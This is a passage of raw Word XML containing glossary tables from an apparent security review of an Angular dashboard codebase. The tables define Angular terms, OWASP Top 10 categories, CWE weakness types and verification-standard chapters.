              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts/chartjs</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">screen.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">D3.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Data-Driven Documents — a JavaScript library for producing dynamic, interactive data visualizations using SVG, Canvas, and HTML. Used by the</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts/d3</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">screen.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">ng2-charts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">An Angular wrapper library for Chart.js that provides Angular-idiomatic component bindings for Chart.js chart types.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">ngx-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">prefix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A naming convention used in this codebase for component selectors, derived from the Nebular UI framework (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">@nebular/theme</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) ecosystem.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Lazy Loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">An Angular router feature where a feature module's JavaScript bundle is only downloaded when the user first navigates to that module's route.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CanActivate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Guard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">An Angular router interface used to protect routes from unauthorized access. Implementing classes return</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">to allow navigation or</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">/a</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">UrlTree</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">to block or redirect it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CanLoad</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Guard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">An Angular router interface that prevents a lazy-loaded module's bundle from being downloaded if the user is not authorized, providing stronger protection than</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CanActivate</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">alone.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">ChangeDetectionStrategy.OnPush</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">An Angular optimization that limits change detection to run only when component</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">@Input</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">references change or an event originates from the component, rather than on every application-wide change detection cycle.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">NgModule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Angular's traditional module system for organizing components, directives, pipes, and services into cohesive units. Contrasted with the newer standalone component pattern.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Standalone Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">An Angular component declared with</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">standalone: true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">that does not belong to an NgModule, providing more explicit dependency declaration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkStart w:id="42" w:name="owasp-top-10-categories-referenced"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Top 10 Categories Referenced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Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">A01 — Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Failures in enforcing restrictions on what authenticated users are allowed to do, including missing authorization checks, insecure direct object references, and privilege escalation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">A03 — Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hostile data sent to an interpreter as part of a command or query, including SQL injection, XSS (Cross-site Scripting), and command injection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">A04 — Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Missing or ineffective security controls resulting from flaws in the design and architecture of an application, not from implementation bugs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">A05 — Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Improperly configured security settings, default configurations, unnecessary features enabled, or missing security hardening.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">A06 — Vulnerable &amp; Outdated Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Use of components (libraries, frameworks, software modules) with known vulnerabilities or that are no longer maintained.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">A07 — Identification &amp; Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Weaknesses in authentication mechanisms, session management, or identity verification that allow attackers to assume other users' identities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">A09 — Security Logging &amp; Monitoring Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Insufficient logging, monitoring, and alerting that prevents detection of breaches, enables attackers to operate undetected, and hinders incident response.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="42"/>
    <w:bookmarkStart w:id="43" w:name="cwe-weakness-types-referenced"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CWE Weakness Types Referenced</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CWE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-79</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Improper Neutralization of Input During Web Page Generation (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Failure to neutralize user-controllable input before it is placed in output used as a web page, allowing script injection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-755</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Improper Handling of Exceptional Conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The software does not handle or incorrectly handles an exceptional condition, leading to undefined or insecure behavior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-778</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Insufficient Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The software does not log security-relevant events, making it difficult to detect attacks or perform forensic analysis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-798</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Use of Hard-coded Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The software contains hard-coded credentials (or by analogy, hard-coded sensitive data values) that cannot be changed without modifying the source code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-862</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Missing Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The software does not perform an authorization check when an actor attempts to access a resource or perform an action.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-1021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Improper Restriction of Rendered UI Layers or Frames</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The web application does not restrict or incorrectly restricts frame or UI layer rendering, enabling clickjacking or UI redressing attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-1059</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Incomplete Documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The software is missing documentation that describes its security properties, design decisions, or known limitations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-1104</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Use of Unmaintained Third-Party Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The software relies on third-party components that are no longer actively maintained, increasing exposure to unpatched vulnerabilities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-1188</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Insecure Default Initialization of Resource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The software initializes a resource with a default value that is less secure than it could be, creating unnecessary risk.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="43"/>
    <w:bookmarkStart w:id="44" w:name="avsv-chapter-names-referenced"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AVSV Chapter Names Referenced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Chapter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">V1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Architecture, Design and Threat Modeling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">V4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">V5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Validation, Sanitization and Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">V7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Error Handling and Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">V8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Data Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">V14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="44"/>
    <w:bookmarkStart w:id="45" w:name="acronyms"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Acronyms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Acronym</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Expansion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">AVSV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Application Security Verification Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">OWASP's framework of security requirements for web applications, organized into 14 chapters.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
